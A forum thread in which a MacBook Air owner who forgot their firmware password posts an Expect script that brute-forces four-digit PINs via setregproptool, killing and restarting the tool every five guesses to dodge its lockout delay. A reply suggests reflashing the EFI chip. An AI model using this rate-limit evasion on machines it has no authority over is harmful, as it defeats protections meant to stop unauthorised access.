Firmware password


8 years 9 months ago #776 by nikkikom
Firmware password was created by nikkikom
Hi, a few months ago I set the firmware password on my MacBookAir6,2. That password does not protect regular booting, but prevents entering recovery mode and booting from external media.

Now I realised that I forgot the password. My guess is that it was not too complicated, probably consisting of a dictionary word or a word and a number.

As I have regular and admin access to the computer, I was able to copy the Firmware Password Utility from the Recovery partition. Now I'm thinking about a brute-force solution, as this utility does not have any delays on bad passwords.

But anyway it's going to be slow and painful. Are there any ways possible with root access in my case? Maybe I could get access to the password hash and try to brute-force it in more powerful ways without the GUI involved?

8 years 9 months ago - 8 years 9 months ago #778 by nikkikom
Replied by nikkikom on topic Firmware password
Here is an expect script that uses setregproptool. It starts setregproptool with the "-o password" argument and then sends 4 more strings with passwords. setregproptool has brute-force checks and inserts delays after 4 bad passwords, so I just kill it and restart after every 5 attempts (including the -o argument).

It took 20 minutes on my MacBook to check all keys from 0000 to 9999. OK for those who have a 4 (or even 6) digit password.

But too slow for me, 'cause my password is alphanum and much longer.

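#!/opt/local/bin/expect -f
# No expect timeout; hide the spawned tool's own output.
set timeout -1
log_user 0
set p 0
while {$p < 10000} {
  # First candidate of the batch goes in through the -o argument.
  set pass [format "%04d" $p]
  send_user "$pass\r";
  set PID [spawn ./setregproptool -d -o "$pass"]
  match_max 100000
  expect -exact "Enter current password: "
  # Four more candidates are answered at the prompt.
  for {set i 0} {$i < 4} {incr i 1} {
    incr p 1
    set pass [format "%04d" $p]
    send -- "$pass\r"
    expect -exact "\r
Enter current password: "
  }
  # Kill the tool before its delay after bad passwords starts, then loop.
  exec kill -9 $PID
  expect eof
  wait -i $spawn_id
}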
Last edit: 8 years 9 months ago by nikkikom.

8 years 9 months ago #807 by thaGH05T
Replied by thaGH05T on topic Firmware password
The best way is to flash your EFI chip. It will save you all the heartache.
